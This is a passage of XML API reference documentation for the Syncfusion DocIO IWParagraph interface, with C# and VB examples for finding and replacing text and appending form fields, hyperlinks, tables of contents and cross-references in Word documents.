                paragraph.AppendHTML(htmlstring);
                //Save and close the document	
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language = "VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load the template document
                Dim document As New WordDocument("Template.docx")
                'Html string to be inserted
                Dim htmlstring As String = "<p><b>This text is inserted as HTML string.</b></p>"
                Dim paragraph As IWParagraph = document.Sections(0).Body.Paragraphs(0)
                'Append the Html string to first paragraph in the document
                paragraph.AppendHTML(htmlstring)
                'Save and close the document	
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.GetStyle">
            <summary>
            Returns the <see cref="T:Syncfusion.DocIO.DLS.IWParagraphStyle"/> applied to the paragraph.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWParagraphStyle"/> of the current paragraph.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.Find(System.String,System.Boolean,System.Boolean)">
            <summary>
            Returns first entry of given string in the paragraph, taking into consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> that specifies the text to find.
            </param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.
            </param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> that contains the found text in the paragraph.
            </returns>
            <example>
            <para>The following code example demonstrates how to find a particular text in the paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document into DocIO instance
                WordDocument document = new WordDocument("Template.docx");
                WParagraph paragraph = document.Sections[0].Paragraphs[1];
                Find the first occurrence of a particular text in the paragraph
                TextSelection textSelection = paragraph.Find("panda", true, true);
                //Get the found text as single text range
                WTextRange textRange = textSelection.GetAsOneRange();
                //Modify the text
                textRange.Text = "Replaced text";
                //Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow;
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document into DocIO instance
                Dim document As New WordDocument("Template.docx")
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(1)
                'Find the first occurrence of a particular text in the paragraph
                Dim textSelection As TextSelection = paragraph.Find("panda", true, true)
                'Get the found text as single text range
                Dim textRange As WTextRange = textSelection.GetAsOneRange()
                'Modify the text
                textRange.Text = "Replaced text"
                'Set highlight color
                textRange.CharacterFormat.HighlightColor = Color.Yellow
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
            <seealso cref="T:Syncfusion.DocIO.DLS.TextSelection"/>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.Replace(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the paragraph with <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>, taking into
            consideration case sensitive and whole word options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                WParagraph paragraph = document.Sections[0].Paragraphs[1];
                //Find the first occurrence of the regular expression
                TextSelection selection = paragraph.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the paragraph
                paragraph.Replace("Giant panda", selection, true, false);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(1)
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = paragraph.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the paragraph
                paragraph.Replace("Giant panda", selection, True, False)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.Replace(System.String,Syncfusion.DocIO.DLS.TextSelection,System.Boolean,System.Boolean,System.Boolean)">
            <summary>
            Replaces all entries of given string in the paragraph with <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/>, taking into
            consideration case sensitive, whole word and formatting options.
            </summary>
            <param name="given">The <b>string</b> represents the text to be found.</param>
            <param name="textSelection">The <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> specifies the text to replace.</param>
            <param name="caseSensitive">Set to <b>true</b> to match the case of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="wholeWord">Set to <b>true</b> to match the whole word of the text similar to specified in the <paramref name="given"/> parameter; otherwise <b>false</b>.</param>
            <param name="saveFormatting">Set to <b>true </b>if to save source formatting; otherwise, <b>false</b>.</param>
            <returns>The <b>integer</b> that represents the count of the replacements made.</returns>
            <example>
            <para>The following code example demonstrates how to replace all the entries of a text in the paragraph.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Load an existing Word document
                WordDocument document = new WordDocument("Template.docx");
                WParagraph paragraph = document.Sections[0].Paragraphs[1];
                //Find the first occurrence of the regular expression
                TextSelection selection = paragraph.Find(new Regex("Panda"));
                //Replace all occurrence of a particular regular expression with the text selection in the paragraph
                paragraph.Replace("Giant panda", selection, true, false, true);            
                //Save and Close the document
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Load an existing Word document
                Dim document As New WordDocument("Template.docx")
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(1)
                'Find the first occurrence of the regular expression
                Dim selection As TextSelection = paragraph.Find(New Regex("Panda"))
                'Replace all occurrence of a particular regular expression with the text selection in the paragraph
                paragraph.Replace("Giant panda", selection, True, False, False)
                'Save and Close the document
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendCheckBox">
            <summary>
            Appends the check box to the paragraph.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WCheckBox"/> instance that represents the newly added checkbox.</returns>
            <example> The following example illustrates how to add a checkbox to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                paragraph.AppendText("Gender\t");
                //Append new Checkbox
                WCheckBox checkbox = paragraph.AppendCheckBox();
                checkbox.Checked = false;
                //Set Checkbox size
                checkbox.CheckBoxSize = 10; 
                checkbox.CalculateOnExit = true;
                //Set help text
                checkbox.Help = "Help text";
                paragraph.AppendText("Male\t");
                checkbox = paragraph.AppendCheckBox();
                checkbox.Checked = false;
                checkbox.CheckBoxSize = 10;
                checkbox.CalculateOnExit = true;
                paragraph.AppendText("Female");
                //Save the Word document
                document.Save("Checkbox.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                paragraph.AppendText("Gender" &amp; vbTab)
                'Append new Checkbox
                Dim checkbox As WCheckBox = paragraph.AppendCheckBox()
                checkbox.Checked = False
                'Set Checkbox size
                checkbox.CheckBoxSize = 10
                checkbox.CalculateOnExit = True
                'Set help text
                checkbox.Help = "Help text"
                paragraph.AppendText("Male" &amp; vbTab)
                checkbox = paragraph.AppendCheckBox()
                checkbox.Checked = False
                checkbox.CheckBoxSize = 10
                checkbox.CalculateOnExit = True
                paragraph.AppendText("Female")
                'Save the Word document
                document.Save("Checkbox.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendTextFormField(System.String)">
            <summary>
            Appends the text form field to the paragraph with the specified default text.
            </summary>
            <param name="defaultText">The <b>string</b> specifying the default text. 
            To insert default Word text, "null" can be passed as parameter.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WTextFormField"/> instance that represents the newly added text form field.</returns>
            <example> The following example illustrates how to add a text form field to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                paragraph.AppendText("General Information");
                section.AddParagraph();
                paragraph = section.AddParagraph() as WParagraph;
                IWTextRange text = paragraph.AppendText("Name\t");
                text.CharacterFormat.Bold = true;
                //Append Text form field 
                WTextFormField textfield = paragraph.AppendTextFormField(null);
                //Set type of Text form field
                textfield.Type = TextFormFieldType.RegularText;
                textfield.CharacterFormat.FontName = "Calibri";
                textfield.CalculateOnExit = true;
                //Save the Word document
                document.Save("Textfield.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                paragraph.AppendText("General Information")
                section.AddParagraph()
                paragraph = TryCast(section.AddParagraph(), WParagraph)
                Dim text As IWTextRange = paragraph.AppendText("Name" &amp; vbTab)
                text.CharacterFormat.Bold = True
                'Append Text form field 
                Dim textfield As WTextFormField = paragraph.AppendTextFormField(Nothing)
                'Set type of Text form field
                textfield.Type = TextFormFieldType.RegularText
                textfield.CharacterFormat.FontName = "Calibri"
                textfield.CalculateOnExit = True
                'Save the Word document
                document.Save("Textfield.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendDropDownFormField">
            <summary>
            Appends the drop down form field to the paragraph.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WDropDownFormField"/> instance that represents the newly added drop down form field.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendCheckBox(System.String,System.Boolean)">
            <summary>
            Appends the check box to the paragraph with specified name and default value.
            </summary>
            <param name="checkBoxName">The <b>string</b> that specifies the name of the check box.</param>
            <param name="defaultCheckBoxValue">A <b>Boolean</b> indicating the default value of the checkbox. 
            <b>True </b>if the checkbox should be checked by default; otherwise, <b>false</b>.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WCheckBox"/> instance that represents the newly added checkbox.</returns>
            <example> The following example illustrates how to add a checkbox to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                paragraph.AppendText("Gender\t");
                //Append new Checkbox
                WCheckBox checkbox = paragraph.AppendCheckBox("CheckBox1", true);
                //checkbox.Checked = false;
                //Set Checkbox size
                checkbox.CheckBoxSize = 10;
                checkbox.CalculateOnExit = true;
                //Set help text
                checkbox.Help = "Help text";
                paragraph.AppendText("Male\t");
                checkbox = paragraph.AppendCheckBox("CheckBox2",false);
                //checkbox.Checked = false;
                checkbox.CheckBoxSize = 10;
                checkbox.CalculateOnExit = true;
                paragraph.AppendText("Female");
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                paragraph.AppendText("Gender" &amp; vbTab)
                'Append new Checkbox
                Dim checkbox As WCheckBox = paragraph.AppendCheckBox("CheckBox1", True)
                'checkbox.Checked = false;
                'Set Checkbox size
                checkbox.CheckBoxSize = 10
                checkbox.CalculateOnExit = True
                'Set help text
                checkbox.Help = "Help text"
                paragraph.AppendText("Male" &amp; vbTab)
                checkbox = paragraph.AppendCheckBox("CheckBox2", False)
                'checkbox.Checked = false;
                checkbox.CheckBoxSize = 10
                checkbox.CalculateOnExit = True
                paragraph.AppendText("Female")
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendTextFormField(System.String,System.String)">
            <summary>
            Appends the text form field to the paragraph with the specified field name and default text.
            </summary>
            <param name="formFieldName">The <b>string </b>that specifies the name of the form field.</param>
            <param name="defaultText">The <b>string</b> specifying the default text. 
            To insert default Word text, "null" can be passed as parameter.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WTextFormField"/> instance that represents the newly added text form field.</returns>
            <example> The following example illustrates how to add a text form field to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                paragraph.AppendText("General Information");
                section.AddParagraph();
                paragraph = section.AddParagraph() as WParagraph;
                IWTextRange text = paragraph.AppendText("Date of Birth\t");
                text.CharacterFormat.Bold = true;
                //Append Text form field
                WTextFormField textfield = paragraph.AppendTextFormField("Date field", DateTime.Now.ToString("MM/DD/YY"));
                textfield.StringFormat = "MM/DD/YY";
                //Set Text form field type
                textfield.Type = TextFormFieldType.DateText;
                textfield.CalculateOnExit = true;
                //Save the Word document
                document.Save("Textfield.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                paragraph.AppendText("General Information")
                section.AddParagraph()
                paragraph = TryCast(section.AddParagraph(), WParagraph)
                Dim text As IWTextRange = paragraph.AppendText("Date of Birth" &amp; vbTab)
                text.CharacterFormat.Bold = True
                'Append Text form field
                Dim textfield As WTextFormField = paragraph.AppendTextFormField("Date field", DateTime.Now.ToString("MM/DD/YY"))
                textfield.StringFormat = "MM/DD/YY"
                'Set Text form field type
                textfield.Type = TextFormFieldType.DateText
                textfield.CalculateOnExit = True
                'Save the Word document
                document.Save("Textfield.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendDropDownFormField(System.String)">
            <summary>
            Appends the drop down form field to the paragraph.
            </summary>
            <param name="dropDropDownName">The <b>string</b> that specifies the name of the drop drop down field.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.WDropDownFormField"/> instance that represents the newly added drop down form field.</returns>
            <example> The following example illustrates how to add a checkbox to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                WParagraph paragraph = section.AddParagraph() as WParagraph;
                paragraph.AppendText("Educational Qualification\t");
                //Append Dropdown field
                WDropDownFormField dropdownfield = paragraph.AppendDropDownFormField("FieldName");
                //Add items to the dropdown items collection
                dropdownfield.DropDownItems.Add("Higher");
                dropdownfield.DropDownItems.Add("Vocational");
                dropdownfield.DropDownItems.Add("Universal");
                dropdownfield.Enabled = true;
                //Set the item index for default value
                dropdownfield.DropDownSelectedIndex = 1;
                dropdownfield.CalculateOnExit = true;
                //Save the Word document
                document.Save("Dropdown.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As WParagraph = TryCast(section.AddParagraph(), WParagraph)
                paragraph.AppendText("Educational Qualification" &amp; vbTab)
                'Append Dropdown field
                Dim dropdownfield As WDropDownFormField = paragraph.AppendDropDownFormField("FieldName")
                'Add items to the dropdown items collection
                dropdownfield.DropDownItems.Add("Higher")
                dropdownfield.DropDownItems.Add("Vocational")
                dropdownfield.DropDownItems.Add("Universal")
                dropdownfield.Enabled = True
                'Set the item index for default value
                dropdownfield.DropDownSelectedIndex = 1
                dropdownfield.CalculateOnExit = True
                'Save the Word document
                document.Save("Dropdown.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendHyperlink(System.String,System.String,Syncfusion.DocIO.DLS.HyperlinkType)">
            <summary>
            Appends the hyperlink to the paragraph with the specified link, display text and type of link.
            </summary>
            <param name="link">The <b>string</b> that specifies the link.</param>
            <param name="text">The <b>string </b> that specifies the text to display.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.HyperlinkType"/> member that specifies the link type.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWField"/> instance that represents the newly added hyperlink.</returns>
            <example> The following example illustrates how to append field to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Web Hyperlink:  ");
                paragraph = section.AddParagraph();
                //Append web hyperlink to the paragraph
                IWField field = paragraph.AppendHyperlink("http://www.syncfusion.com", "Syncfusion", HyperlinkType.WebLink);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Web Hyperlink:  ")
                paragraph = section.AddParagraph()
                'Append web hyperlink to the paragraph
                Dim field As IWField = paragraph.AppendHyperlink("http://www.syncfusion.com", "Syncfusion", HyperlinkType.WebLink)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendHyperlink(System.String,Syncfusion.DocIO.DLS.WPicture,Syncfusion.DocIO.DLS.HyperlinkType)">
            <summary>
            Appends the hyperlink to the paragraph with the specified link, picture and type of link.
            </summary>
            <param name="link">The <b>string</b> that specifies the link.</param>
            <param name="picture">The <see cref="T:Syncfusion.DocIO.DLS.WPicture">picture</see> to display.</param>
            <param name="type">The <see cref="T:Syncfusion.DocIO.DLS.HyperlinkType"/> member that specifies the link type.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.IWField"/> instance that represents the newly added hyperlink.</returns>
            <example> The following example illustrates how to append field to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document 
                WordDocument document = new WordDocument();
                //Add new section to the document
                IWSection section = document.AddSection();
                //Add new paragraph to the section
                IWParagraph paragraph = section.AddParagraph();
                paragraph.AppendText("Image Hyperlink");
                paragraph = section.AddParagraph();
                //Create a new image instance and load image 
                WPicture picture = new WPicture(document);
                picture.LoadImage(Image.FromFile("Image.png"));
                //Append new image hyperlink to the paragraph
                paragraph.AppendHyperlink("http://www.syncfusion.com", picture, HyperlinkType.WebLink);
                //Save the Word document
                document.Save("Sample.docx", FormatType.Docx);
                //Close the document
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document 
                Dim document As New WordDocument()
                'Add new section to the document
                Dim section As IWSection = document.AddSection()
                'Add new paragraph to the section
                Dim paragraph As IWParagraph = section.AddParagraph()
                paragraph.AppendText("Image Hyperlink")
                paragraph = section.AddParagraph()
                'Create a new image instance and load image 
                Dim picture As New WPicture(document)
                picture.LoadImage(Image.FromFile("Image.png"))
                'Append new image hyperlink to the paragraph
                paragraph.AppendHyperlink("http://www.syncfusion.com", picture, HyperlinkType.WebLink)
                'Save the Word document
                document.Save("Sample.docx", FormatType.Docx)
                'Close the document
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.RemoveAbsPosition">
            <summary>
            Removes the absolute position data, if paragraph has absolute position in the document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendTOC(System.Int32,System.Int32)">
            <summary>
            Appends the table of content to the end of the paragraph with the specified lower and upper heading levels.
            </summary>
            <param name="lowerHeadingLevel">The <b>integer </b> specifying the starting heading level of the table of content.</param>
            <param name="upperHeadingLevel">The <b>integer </b> specifying the ending heading level of the table of content.</param>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.TableOfContent"/> instance that represents the newly added table of content.</returns>
            <example> The following example illustrates how to add a table of contents to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                //Add the section into the Word document
                IWSection section = document.AddSection();
                string paraText = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula";
                //Add the paragraph into the created section
                IWParagraph paragraph = section.AddParagraph();
                //Append the TOC field with LowerHeadingLevel and UpperHeadingLevel to determines the TOC entries
                paragraph.AppendTOC(1, 3);
                //Add the section into the Word document
                section = document.AddSection();
                //Add the paragraph into the created section
                paragraph = section.AddParagraph(); 
                //Add the text for the headings
                paragraph.AppendText("First Chapter");
                //Set a build in heading style.
                paragraph.ApplyStyle(BuiltinStyle.Heading1);
                //Add the text into the paragraph
                section.AddParagraph().AppendText(paraText);
                //Add the section into the Word document
                section = document.AddSection();
                //Add the paragraph into the created section
                paragraph = section.AddParagraph();
                //Add the text for the headings
                paragraph.AppendText("Second Chapter");
                //Set a build in heading style.
                paragraph.ApplyStyle(BuiltinStyle.Heading2);
                //Add the text into the paragraph
                section.AddParagraph().AppendText(paraText);
                //Add the section into the Word document
                section = document.AddSection();
                //Add the paragraph into the created section
                paragraph = section.AddParagraph();
                //Add the text into the headings
                paragraph.AppendText("Third Chapter");
                //Set a build in heading style
                paragraph.ApplyStyle(BuiltinStyle.Heading3);
                //Add the text into the paragraph.
                section.AddParagraph().AppendText(paraText);
                //Update the table of contents
                document.UpdateTableOfContents();
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                'Add the section into the Word document
                Dim section As IWSection = document.AddSection()
                Dim paraText As String = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula"
                'Add the paragraph into the created section
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Append the TOC field with LowerHeadingLevel and UpperHeadingLevel to determines the TOC entries
                paragraph.AppendTOC(1, 3)
                'Add the section into the Word document
                section = document.AddSection()
                'Add the paragraph into the created section
                paragraph = section.AddParagraph()
                'Add the text for the headings
                paragraph.AppendText("First Chapter")
                'Set a build in heading style
                paragraph.ApplyStyle(BuiltinStyle.Heading1)
                'Add the text into the paragraph.
                section.AddParagraph().AppendText(paraText)
                'Add the section into the Word document
                section = document.AddSection()
                'Add the paragraph into the created section
                paragraph = section.AddParagraph()
                'Add the text for the headings
                paragraph.AppendText("Second Chapter")
                'Set a build in heading style
                paragraph.ApplyStyle(BuiltinStyle.Heading2)
                'Add the text into the paragraph
                section.AddParagraph().AppendText(paraText)
                'Add the section into the Word document
                section = document.AddSection()
                'Add the paragraph into the created section
                paragraph = section.AddParagraph()
                'Add the text into the headings
                paragraph.AppendText("Third Chapter")
                'Set a build in heading style
                paragraph.ApplyStyle(BuiltinStyle.Heading3)
                'Add the text into the paragraph
                section.AddParagraph().AppendText(paraText)
                'Update the table of contents
                document.UpdateTableOfContents()
                �Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IWParagraph.AppendCrossReference(Syncfusion.DocIO.ReferenceType,Syncfusion.DocIO.ReferenceKind,Syncfusion.DocIO.DLS.Entity,System.Boolean,System.Boolean,System.Boolean,System.String)">
            <summary>
            Appends a Cross-Reference of specified reference type, reference kind, entity, hyperlink, separators at the end of the paragraph.
            </summary>
            <param name="referenceType">The <see cref="T:Syncfusion.DocIO.ReferenceType"/> member that specifies the 
            type of item for which a cross-reference is to be inserted.</param>
            <param name="referenceKind">The <see cref="T:Syncfusion.DocIO.ReferenceKind"/> member that specifies the 
            information to be included in the cross-reference.</param>
            <param name="referenceEntity">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> for which a cross-reference is to be inserted.</param>
            <param name="insertAsHyperlink"><b>True</b> if to insert the cross-reference as a hyperlink to the referenced item; otherwise, <b>false</b>.</param>
            <param name="includePosition"><b>True</b> if to insert "above" or "below," depending on the location of the reference item in relation to the cross-reference.</param>
            <param name="separatorNumber"><b>True</b> if to use a separator to separate the numbers from the associated text; otherwise, <b>false</b>.(Used only if the ReferenceKind parameter is set to ParagraphNumberFullContext).</param>
            <param name="separatorString">The <b>string</b> that specifies a separator if the separateNumber parameter is set to <b>true</b>.</param>
            <remarks><list type="bullet">
            <item>The cross reference fields can be created and updated only for the <see cref="T:Syncfusion.DocIO.DLS.Bookmark"/> in a document.</item>
            <item>Use the <see cref="M:Syncfusion.DocIO.DLS.WordDocument.GetCrossReferenceItems(Syncfusion.DocIO.ReferenceType)"/> method to get a list of items that can have cross-reference. 
            </item>
            </list> 
            </remarks>
            <example> The following example illustrates how to append a cross-reference for bookmark to the paragraph.
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument();
                IWSection section = document.AddSection();
                IWParagraph paragraph = section.AddParagraph();
                //Add text, bookmark start and end in the paragraph
                paragraph.AppendBookmarkStart("Title");
                paragraph.AppendText("Northwind Database");
                paragraph.AppendBookmarkEnd("Title");
                paragraph = section.AddParagraph();
                paragraph.AppendText("The Northwind sample database (Northwind.mdb) is included with all versions of Access. It provides data you can experiment with and database objects that demonstrate features you might want to implement in your own databases.");
                section = document.AddSection();
                section.AddParagraph();
                paragraph = section.AddParagraph() as WParagraph;
                //Get the collection of bookmark start in the word document
                List&lt;Entity&gt; items = document.GetCrossReferenceItems(ReferenceType.Bookmark);
                paragraph.AppendText("Bookmark Cross Reference starts here ");
                //Append the cross reference for bookmark �Title� with ContentText as reference kind
                paragraph.AppendCrossReference(ReferenceType.Bookmark, ReferenceKind.ContentText, items[0], true, false, false, string.Empty);
                //Update the document Fields
                document.UpdateDocumentFields();
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument()
                Dim section As IWSection = document.AddSection()
                Dim paragraph As IWParagraph = section.AddParagraph()
                'Add text, bookmark start and end in the paragraph
                paragraph.AppendBookmarkStart("Title")
                paragraph.AppendText("Northwind Database")
                paragraph.AppendBookmarkEnd("Title")
                paragraph = section.AddParagraph()
                paragraph.AppendText("The Northwind sample database (Northwind.mdb) is included with all versions of Access. It provides data you can experiment with and database objects that demonstrate features you might want to implement in your own databases.")
                section = document.AddSection()
                section.AddParagraph()
